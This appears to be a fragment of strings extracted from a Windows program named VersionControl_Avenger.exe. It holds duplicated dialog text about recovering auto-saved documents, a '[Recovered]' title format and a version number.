Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
%s [Recovered]
1.0.0.1
1.0.0.1
VersionControl_Avenger.exe
VersionControl_Avenger.exe